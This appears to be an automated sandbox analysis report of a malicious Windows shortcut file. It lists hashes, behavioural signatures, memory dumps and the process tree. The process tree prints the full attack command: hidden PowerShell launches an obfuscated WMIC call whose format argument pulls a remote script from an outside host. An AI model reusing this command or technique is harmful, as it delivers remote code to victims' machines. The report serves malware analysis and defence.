Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    03-05-2024 14:00

General

  • Target

    10b13164d176e732956516a755f872c3_JaffaCakes118.lnk

  • Size

    1KB

  • MD5

    10b13164d176e732956516a755f872c3

  • SHA1

    6d449dcdc8c8949244f7a4806173688d1f10c199

  • SHA256

    067ea6c4222e17118af66c5c84e23e771ed9e5ef582062e60a881b0278fe9134

  • SHA512

    29ab0062c362b80512d0714bd4ef745ad5baf1036580da782346444e9031c8ed4e7fecfa76cd7930b1e3e9ac8371d28ef96e554d5497f4c38581f714b3029e5f

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\10b13164d176e732956516a755f872c3_JaffaCakes118.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" start-process 'C:\??*?\*3?\??*?\w?ic.?x?' '" os get LHKnccmxv, hhj266lgu, t986daWUI, HJrnmcxbi, organization /format:""http://hhs4666lu.cavalodetroia06.xyz:25098/04/?136025098mcxxiruj6"""' -WindowStyle Hidden
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\System32\wbem\WMIC.exe
        "C:\Windows\System32\wbem\WMIC.exe" os get LHKnccmxv, hhj266lgu, t986daWUI, HJrnmcxbi, organization /format:"http://hhs4666lu.cavalodetroia06.xyz:25098/04/?136025098mcxxiruj6"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2388

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2628-38-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

    Filesize

    4KB

  • memory/2628-39-0x000000001B530000-0x000000001B812000-memory.dmp

    Filesize

    2.9MB

  • memory/2628-40-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

  • memory/2628-41-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2628-45-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2628-44-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2628-43-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2628-42-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2628-46-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB